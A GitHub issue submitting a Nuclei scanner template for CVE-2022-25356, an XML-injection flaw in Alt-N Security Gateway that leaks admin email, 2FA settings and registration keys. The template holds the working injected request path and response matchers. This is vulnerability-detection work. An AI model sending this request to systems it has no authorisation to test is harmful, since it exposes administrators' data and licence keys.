### ISSUE TITLE
CVE-2022-25356

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4089]
### Template Information:

https://www.swascan.com/security-advisory-alt-n-security-gateway

### Nuclei Template:

```yaml
id: CVE-2022-25356

info:
  name: Unauthenticated registration key disclosure through XML Injection
  author: Akincibor
  severity: high
  description: In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.
  reference: https://www.swascan.com/security-advisory-alt-n-security-gateway/
  tags: xml

requests:
  - method: GET
    path:
      - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<Name>"
          - "<Language>"
          - "<IsAdmin>"
        part: body
        condition: or
```
